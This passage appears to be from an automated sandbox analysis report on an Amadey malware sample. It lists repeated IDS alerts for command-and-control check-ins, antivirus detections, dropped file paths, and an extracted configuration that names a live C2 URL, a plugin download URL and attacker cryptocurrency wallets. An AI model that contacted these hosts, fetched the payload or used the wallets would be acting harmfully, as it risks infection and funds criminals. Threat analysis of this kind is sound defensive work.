                          Source Port:50287
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450220802027700 02/07/23-20:03:12.442628
                          SID:2027700
                          Source Port:50220
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450315802027700 02/07/23-20:03:38.266612
                          SID:2027700
                          Source Port:50315
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450226802027700 02/07/23-20:03:13.874522
                          SID:2027700
                          Source Port:50226
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450394802027700 02/07/23-20:03:57.671451
                          SID:2027700
                          Source Port:50394
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450119802027700 02/07/23-20:02:44.644394
                          SID:2027700
                          Source Port:50119
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450208802027700 02/07/23-20:03:09.500907
                          SID:2027700
                          Source Port:50208
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450404802027700 02/07/23-20:04:00.112465
                          SID:2027700
                          Source Port:50404
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450060802027700 02/07/23-20:02:26.448814
                          SID:2027700
                          Source Port:50060
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450103802027700 02/07/23-20:02:40.685701
                          SID:2027700
                          Source Port:50103
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450109802027700 02/07/23-20:02:42.172519
                          SID:2027700
                          Source Port:50109
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449969802027700 02/07/23-20:01:59.969581
                          SID:2027700
                          Source Port:49969
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450080802027700 02/07/23-20:02:34.379327
                          SID:2027700
                          Source Port:50080
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449874802027700 02/07/23-20:01:33.109253
                          SID:2027700
                          Source Port:49874
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449963802027700 02/07/23-20:01:58.504584
                          SID:2027700
                          Source Port:49963
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449785802027700 02/07/23-20:01:07.828926
                          SID:2027700
                          Source Port:49785
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450210802027700 02/07/23-20:03:09.990259
                          SID:2027700
                          Source Port:50210
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450032802027700 02/07/23-20:02:18.890388
                          SID:2027700
                          Source Port:50032
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450014802027700 02/07/23-20:02:14.441730
                          SID:2027700
                          Source Port:50014
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450121802027700 02/07/23-20:02:45.141107
                          SID:2027700
                          Source Port:50121
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450338802027700 02/07/23-20:03:43.908584
                          SID:2027700
                          Source Port:50338
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450427802027700 02/07/23-20:04:05.737324
                          SID:2027700
                          Source Port:50427
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449823802027700 02/07/23-20:01:18.077794
                          SID:2027700
                          Source Port:49823
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449808802027700 02/07/23-20:01:14.637798
                          SID:2027700
                          Source Port:49808
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449820802027700 02/07/23-20:01:17.299894
                          SID:2027700
                          Source Port:49820
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449979802027700 02/07/23-20:02:02.207618
                          SID:2027700
                          Source Port:49979
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449731802027700 02/07/23-20:00:54.023441
                          SID:2027700
                          Source Port:49731
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449912802027700 02/07/23-20:01:42.328220
                          SID:2027700
                          Source Port:49912
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449994802027700 02/07/23-20:02:09.136024
                          SID:2027700
                          Source Port:49994
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450264802027700 02/07/23-20:03:25.691639
                          SID:2027700
                          Source Port:50264
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450353802027700 02/07/23-20:03:47.599615
                          SID:2027700
                          Source Port:50353
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449734802027700 02/07/23-20:00:54.737090
                          SID:2027700
                          Source Port:49734
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450001802027700 02/07/23-20:02:11.159823
                          SID:2027700
                          Source Port:50001
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450350802027700 02/07/23-20:03:46.848980
                          SID:2027700
                          Source Port:50350
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450172802027700 02/07/23-20:03:00.921461
                          SID:2027700
                          Source Port:50172
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450261802027700 02/07/23-20:03:23.514341
                          SID:2027700
                          Source Port:50261
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450442802027700 02/07/23-20:04:09.409561
                          SID:2027700
                          Source Port:50442
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450083802027700 02/07/23-20:02:35.239474
                          SID:2027700
                          Source Port:50083
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450086802027700 02/07/23-20:02:36.208344
                          SID:2027700
                          Source Port:50086
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450004802027700 02/07/23-20:02:11.893867
                          SID:2027700
                          Source Port:50004
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450175802027700 02/07/23-20:03:01.662459
                          SID:2027700
                          Source Port:50175
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450249802027700 02/07/23-20:03:19.487023
                          SID:2027700
                          Source Port:50249
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449925802027700 02/07/23-20:01:47.192101
                          SID:2027700
                          Source Port:49925
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450414802027700 02/07/23-20:04:02.595462
                          SID:2027700
                          Source Port:50414
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450325802027700 02/07/23-20:03:40.711953
                          SID:2027700
                          Source Port:50325
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450455802027700 02/07/23-20:04:12.584652
                          SID:2027700
                          Source Port:50455
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449747802027700 02/07/23-20:00:57.887103
                          SID:2027700
                          Source Port:49747
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449966802027700 02/07/23-20:01:59.250311
                          SID:2027700
                          Source Port:49966
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449877802027700 02/07/23-20:01:33.832947
                          SID:2027700
                          Source Port:49877
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449836802027700 02/07/23-20:01:21.202537
                          SID:2027700
                          Source Port:49836
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449772802027700 02/07/23-20:01:03.779261
                          SID:2027700
                          Source Port:49772
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449788802027700 02/07/23-20:01:09.765672
                          SID:2027700
                          Source Port:49788
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449991802027700 02/07/23-20:02:05.764041
                          SID:2027700
                          Source Port:49991
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449861802027700 02/07/23-20:01:29.882532
                          SID:2027700
                          Source Port:49861
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450058802027700 02/07/23-20:02:25.697906
                          SID:2027700
                          Source Port:50058
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450236802027700 02/07/23-20:03:16.324345
                          SID:2027700
                          Source Port:50236
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450017802027700 02/07/23-20:02:15.190910
                          SID:2027700
                          Source Port:50017
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450366802027700 02/07/23-20:03:50.757393
                          SID:2027700
                          Source Port:50366
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450099802027700 02/07/23-20:02:39.663652
                          SID:2027700
                          Source Port:50099
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450147802027700 02/07/23-20:02:54.873680
                          SID:2027700
                          Source Port:50147
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450188802027700 02/07/23-20:03:04.590702
                          SID:2027700
                          Source Port:50188
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450277802027700 02/07/23-20:03:28.892621
                          SID:2027700
                          Source Port:50277
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450106802027700 02/07/23-20:02:41.451184
                          SID:2027700
                          Source Port:50106
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllAvira URL Cloud: Label: malware
                          Source: http://62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                          Source: 62.204.41.4/Gol478Ns/index.phpAvira URL Cloud: Label: malware
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: file.exeVirustotal: Detection: 48%Perma Link
                          Source: 62.204.41.4/Gol478Ns/index.phpVirustotal: Detection: 12%Perma Link
                          Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dllVirustotal: Detection: 16%Perma Link
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeReversingLabs: Detection: 53%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeReversingLabs: Detection: 80%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeReversingLabs: Detection: 47%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllReversingLabs: Detection: 80%
                          Source: file.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeJoe Sandbox ML: detected
                          Source: 19.0.mnolyk.exe.980000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
                          Source: 22.2.rundll32.exe.6d0c0000.0.unpackMalware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00942F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

                          Compliance

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeUnpacked PE file: 2.2.afCf.exe.400000.0.unpack
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.250463432.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000B.00000003.316310103.0000000001682000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000000.315748298.000000000138E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000C.00000002.775000934.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000C.00000000.318162039.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.329735996.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.332650893.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.352215568.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.352736386.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000000.478701407.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000002.479552852.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.607657638.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.607327719.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000000.735938171.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000002.736512930.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.11.dr, xriv.exe.0.dr
                          Source: Binary string: Healer.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000006.00000000.290177703.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\wevepipes\ho.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000000.250999613.0000000000401000.00000020.00000001.01000000.00000005.sdmp, afCf.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000016.00000002.775107488.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.12.dr, clip64.dll.12.dr
                          Source: Binary string: Healer.pdbH5 source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00942390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0137FC58 FindFirstFileExW,

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49718 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49720 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49721 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49722 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49723 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49724 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49725 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49726 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49727 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49728 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49729 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49730 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49731 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49732 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49733 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49734 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49735 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49736 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49737 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49738 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49739 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49740 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49741 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49742 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49743 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49744 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49745 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49746 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49747 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49748 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49749 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49750 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49751 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49752 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49753 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49754 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49755 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49756 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49757 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49758 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49759 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49761 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49762 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49763 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49764 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49765 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49766 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49767 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49768 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49769 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49770 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49771 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49772 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49773 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49774 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49775 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49777 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49778 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49779 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49780 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49781 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49782 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49783 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49784 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49785 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49786 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49787 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49788 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49789 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49790 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49791 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49792 -> 62.204.41.4:80
